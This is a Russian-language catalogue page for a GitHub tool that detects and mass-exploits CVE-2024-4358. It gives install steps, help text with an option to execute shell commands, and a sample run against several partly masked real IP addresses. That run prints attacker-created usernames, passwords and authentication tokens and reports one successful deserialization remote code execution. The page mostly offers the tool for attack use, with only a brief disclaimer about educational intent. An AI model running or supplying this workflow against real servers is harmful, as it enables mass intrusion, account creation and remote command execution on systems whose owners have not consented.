Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
CVE-2024-4358 — Инструмент для обнаружения и эксплуатации уязвимости CVE-2024-4358 | Kitploit
Инструменты/GitHubGitHub/revoltsecurities/cve-2024-4358
Анализ уязвимостейЭксплуатацияЭксплуатация веб-приложенийТестирование на ПроникновениеОбучение и ОбразованиеRed Teaming
GitHubrevoltsecurities/cve-2024-4358

CVE-2024-4358

Инструмент для обнаружения и эксплуатации уязвимости CVE-2024-4358

Репозиторий
512 лет назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

CVE-2024-4358

Инструмент для обнаружения и массовой эксплуатации уязвимости CVE-2024-4358

Установка:

root@kitploit:~
git clone https://github.com/RevoltSecurities/CVE-2024-4358
pip install -r requirements.txt
python3 exploit.py --help

Использование:

root@kitploit:~
python3 exploit.py -h                                                                           


    ______     ____  __         _ ______         
   / ____/  __/ __ \/ /  ____  (_)_  __/__  _____
  / __/ | |/_/ /_/ / /  / __ \/ / / / / _ \/ ___/
 / /____>  </ ____/ /__/ /_/ / / / / /  __/ /    
/_____/_/|_/_/   /_____|____/_/ /_/  \___/_/     
  
                    @RevoltSecurities

[Описание]: Инструмент для обнаружения и эксплуатации уязвимости CVE-2024-4358

options:
  -h, --help            показать это сообщение справки и выйти
  -u URL, --url URL     [ИНФ]: Укажите URL или IP с портом для обнаружения уязвимости
  -l LIST, --list LIST  [ИНФ]: Укажите список URL или IP для обнаружения уязвимости
  -c COMMAND, --command COMMAND
                        [ИНФ]: Укажите команду оболочки для выполнения
  -t THREADS, --threads THREADS
                        [ИНФ]: Количество потоков для списка URL
  -proxy PROXY, --proxy PROXY
                        [ИНФ]: Прокси-URL для отправки запроса через ваш прокси
  -v, --verbose         [ИНФ]: Увеличивает подробность вывода в консоли
  -o OUTPUT, --output OUTPUT
                        [ИНФ]: Имя файла для сохранения вывода уязвимого целевого объекта

Пример использования:

root@kitploit:~
python3 exploit.py -l urls.txt -c id -t 10                                                      


    ______     ____  __         _ ______         
   / ____/  __/ __ \/ /  ____  (_)_  __/__  _____
  / __/ | |/_/ /_/ / /  / __ \/ / / / / _ \/ ___/
 / /____>  </ ____/ /__/ /_/ / / / / /  __/ /    
/_____/_/|_/_/   /_____|____/_/ /_/  \___/_/     
  
                    @RevoltSecurities

[Уязвимый]: Отчет для: http://13.42.129.XXX
 Учетные данные: Имя пользователя: ozsebbQpibJbHpghuNLxutxBOl | Пароль: NvmpjJucmxtqhOtdFtrxfoguvQ | Токен аутентификации: 7CKVJAPcvFGsfIwxON6KgCy85k8xwDXoKGzV1A3KgUeB-y-DQ_F6k86XjY9KCbSjuHcaog-AJ8AApDtOkGvDw109zvjJUllJESksFmxd8ZK8r1Xdn8u-5sHX-RWmbJBEg5tDSOaQrPPNCds7RyzhEGcTiVbG0gDUfiIFgmwNWa1i8VOhhTgASDARnfPXfOfqsWqv23SrLXteuEXNymjDrC-GXWvhRHZ8a_vWhfJBSBB7aBZmXux1iq07InnAPwYC2Y12TrEG6MUPPCBHSW-vlld850MBuCktR7vjLdzahJAAdERMbAudSnetHBY4AN-221F6iIY2GjjenRiNCnJOt8gfK3I5b57d6QFy3i3a4GxnM-5AUfTGrbHrHrxP5hzpfz5bhG-xulDTyOK-g6UJJQOQBIWHIUA-QOzOufSNovv0gBnhilYBTY9ITDJSOOWSdxDVmr4U4re8xI_3InkeK8IRkIzMmTxrrnQi_J8or0hqP-7yMPCJR5gIQrOMUXPtatpVqZikho8aR3aWCcAHmoJr5yU
 Десериализация RCE: Неудачно
[Уязвимый]: Отчет для: http://52.2.58.XX
 Учетные данные: Имя пользователя: pjzgrOrjJXqQyFoubmrcSkHZHC | Пароль: ZrGVXZqIrgWkuHCgUlkHIeYPG | Токен аутентификации: S6q_Le5LoTqew1AmblOvZfBU5R7U0BEcBJ84UvvBf2HnUzJ_wCtstEYHqhxgEBSj7uWQ7iCCoW-_I5Z7XXpkolAN831q_NWsarTsqbm98XKP5CToJ_7lrS_1SbWCd6TJbdrBYHoSCEnRF0DMbhPzdY4TGv9P7gJQHf37jPm2lkDfC6kLyBXFopZklIwv6WrvmFw04vzLDKCWpgLP88GGqRKPJPnMNNarIUu9Mn_fV2WOei4LFWJMnmHTyLPAhK7eMLmjGmwr6jgRQp7C7PhNIpugRvUkyS8381ddVcXV8LJv2OR2yA2e2efE-Oc0
 Десериализация RCE: Неудачно
[Уязвимый]: Отчет для: http://194.233.XXX.235:83
 Учетные данные: Имя пользователя: YmWwYloORUtOUPGuVDCbxZmuEKoIPL | Пароль: EPuvJTzroIfncpAHHGjJYXAKaPhQMW | Токен аутентификации: Ja42x9_DsL88xoSpm9xJoVIyeYEesbK2p-tZnOP-yvuiiF_DYNA6vNBeIwe8y2OcUJuOcCPtR_ODGynVtgCMmtpZxb_KRusasjNrlM2cNPKP4omDYacvcejGPycPmmd_A4Qi0ohEPG3Y4JfaU7Le3DJlMSTEoneCqcrXRqNS2JbTIXzOSXM3dSMz_0AwgHVN4H35HCkcAbedA5c-OLv_d6n9evsyHiHm15FuqbWzzqq-nTcXRiUtSYXEspCyiXE22ZlRdzClA6WDKC0-b1kFWj4Jb1yr3WULzmYHespHoRnXti_1gJoRs6Qbv2
 Отчет создан: ELHaimYtblAxViEKIXxpdFyOXNlEHb
 Десериализация RCE: Успешно
Exploiter |████████████████████████████████████████| 3/3 [100%] in 7.5s (0.34/s) 

ИНФОРМАЦИЯ:

Инструмент разработан D.Sanjai Kumar @RevoltSecurities для обнаружения и массовой эксплуатации уязвимости CVE-2024-4358. Инструмент предназначен только для образовательных и этических целей, и разработчики не несут ответственности за любое незаконное использование.

Скачать инструмент